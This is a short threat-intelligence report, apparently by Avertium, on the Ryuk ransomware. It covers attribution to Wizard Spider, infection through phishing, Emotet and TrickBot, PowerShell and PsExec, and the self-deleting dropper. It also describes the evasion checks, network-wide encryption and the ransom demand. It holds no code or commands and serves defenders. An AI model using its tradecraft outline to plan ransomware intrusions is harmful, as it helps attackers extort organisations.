This report is an overview of the Ryuk ransomware and contains actionable intelligence for understanding and protecting against the malware threat.
Discovered in 2018, this ransomware continues to attract publicity because of its impact on large organizations. Malware researchers have noted increased activity by the ransomware in recent months. Most recently, Ryuk successfully attacked Universal Health Services, one of the largest healthcare providers in the nation.
Ryuk has been attributed to a few threat actors with its origins traced to North Korea or Russia. The Russia-based Wizard Spider threat actor appears to be behind the ransomware attacks and is also credited with activity by the TrickBot malware.
Malware researchers believe Ryuk is a derivative of the older Hermes ransomware, as much of the same code is used by Ryuk. However, Ryuk has continued to develop beyond Hermes since its discovery. At this time only Windows OS devices appear to be targeted.
Like so much other malware, infection by Ryuk often begins with a phishing campaign. Phishing may be used to directly infect victims with the ransomware or may initially infect with Emotet or TrickBot. The threat actor may later decide to push out the Ryuk ransomware executable payload to encrypt the system. PowerShell scripts are commonly used for the download, leveraging tools like PowerShell Empire and PsExec. Avertium partner Sophos offers this graphic to depict an example chain of infection.
Ryuk is distributed with a dropper for the actual executable payload. The dropper is not often seen, as it is deleted from the system once the payload runs. The dropper randomly generates the payload file name upon installation.
Before encryption, the malware checks the system to determine whether VirtualBox is being used or whether the language is Russian, Ukrainian, or Belarusian, and will not execute on these systems. Ryuk enumerates the network and all drives on the host to encrypt all mounted drives on the system and any hosts it can reach remotely. Ryuk uses RSA-2048 and AES-256 to encrypt the files. Once encrypted, a ransom note is placed on the system requesting Bitcoin payment for the decryption of files.
The below example is provided by CrowdStrike:
With the prevalence, severity, and sophistication of cybersecurity attacks growing by the day, businesses of all types and sizes are scrambling to protect themselves. This best practices guide takes you through the 8 essential steps to managing a data breach. Download now.
Note: The Avertium Threat Report analyzes one current threat that has been shared by threat intelligence networks across the globe. Used internally by the Avertium CyberOps Team, this report will outline a “top-of-mind” threat and how it ought to be addressed accordingly.
This informed analysis is based on the latest data available.